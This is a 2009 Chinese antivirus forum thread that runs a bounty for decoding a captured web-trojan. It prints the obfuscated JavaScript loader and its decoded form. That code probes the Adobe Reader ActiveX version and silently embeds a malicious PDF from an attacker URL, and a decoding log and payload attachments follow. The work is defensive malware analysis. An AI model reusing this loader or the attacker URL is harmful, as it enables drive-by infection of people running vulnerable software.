瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第三十七期(附pdf文件在9楼)结束

12   1  /  2  页   跳转

[悬赏] 网马解密悬赏第三十七期(附pdf文件在9楼)结束

网马解密悬赏第三十七期(附pdf文件在9楼)结束



引用:
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:论坛所有会员均可参加


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
最后编辑networkedition 最后编辑于 2009-11-18 09:18:28
分享到:
gototop
 

源代码如下:




// <script>
tpZ=23;if(yFc=unescape)tpZ='';fUJxi=yFc('%'+tpZ);
BjX5='doj63umenx74.wrix74e(q22R3cj64iv sq74ylex3dj5cq22positionq3aabsoluteq3bR20leq66tj3ax2dj31000q70q78q3b tx6fpq3ax2d1j3000R70j78q3bR5cj22x3eq22)j3bvx61r R46YR71j3dnullq3btryx7bFj59j71j3dnewx20Activq65Xj4fbq6aecq74(R22q41j63roPDFq2ePx44FR22)q3bx7dj63q61tcj68(e)R7bR7dif(q21Fq59q71)x7bj74rj79x7bFYj71x3dneR77j20ActiveXx4fj62q6aect(x22Pj44F.PdfCtR72lq22)j3bj7dcatq63x68(e)q7bR7dR7diR66(FYj71q29j7blvj3dj28j28FYR71.Getx56eq72sionsj28).sx70R6cix74(q22,j22)j29q5bj34R5d.splR69x74(j22j3dq22))q5b1j5dx2erepx6cj61ce(R2fq5cx2ex2fg,R22j22)R3bif((lq76R3cq390j30)x26q26(lvx21j3dx381j33)R29docj75ment.writx65(q27R3ceR6dbx65d srcj3dq22hq74tpx3ax2fx2fghoj73tx2dmail.deq2f0000009c2ej31j335bfx30q31R2fR732R64pq61yyp.phpx3fsj3dd1TNx66x4dfj26x69j64x3d2q22 widthq3dR31R30x30R20R68eigj68tj3d100 tx79peR3dR22q61pq70licaq74ionx2fpdfx22R3eq3cq2fembedj3eR27)x3bx7dq64q6fcx75j6dentR2ej77j72ite(x22R3cx2fdx69vj3ex22)x3b';
zPiEu=yFc(BjX5.replace(/[xjqR]/g,fUJxi));eval(zPiEu);
//</script>


gototop
 

回复:网马解密悬赏第三十七期

document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");var FYq=null;try{FYq=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!FYq){try{FYq=new ActiveXObject("PDF.PdfCtrl");}catch(e){}}if(FYq){lv=((FYq.GetVersions().split(","))[4].split("="))[1].replace(/\./g,"");if((lv<900)&&(lv!=813))document.write('<embed src="http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2" width=100 height=100 type="application/pdf"></embed>');}document.write("</div>");
gototop
 

回复:网马解密悬赏第三十七期

http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2

T馆成功,耶
gototop
 

回复:网马解密悬赏第三十七期

关于:hxxp://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php解密的日志(全体输出 -  2):

Level  0>http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php
Level  1>http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2

analyzed by 是昔流芳

一个eval而已
gototop
 

回复: 网马解密悬赏第三十七期

顺便问一句,孔子用什么工具获取的代码?
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2
这个获取的是残缺不全的代码
gototop
 

回复 6F 是昔流芳 的帖子

直接使用下载工具下载,是个dat文件,实际是个pdf文件。ms代码也不全。
gototop
 

回复 6F 是昔流芳 的帖子

是个PDF
如果。。。呵呵需要自己读取代码否则得到的只能是没用的函数
gototop
 

回复: 网马解密悬赏第三十七期

附下载的dat文件修改扩展名为pdf

附件附件:

文件名:j0cTk.rar
下载次数:6829
文件类型:application/octet-stream
文件大小:
上传时间:2009-11-17 13:27:30
描述:rar

gototop
 

回复: 网马解密悬赏第三十七期

我发上来吧

附件附件:

文件名:gzS0.rar
下载次数:6838
文件类型:application/octet-stream
文件大小:
上传时间:2009-11-17 13:30:11
描述:rar

最后编辑ty88 最后编辑于 2009-11-17 13:30:11
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT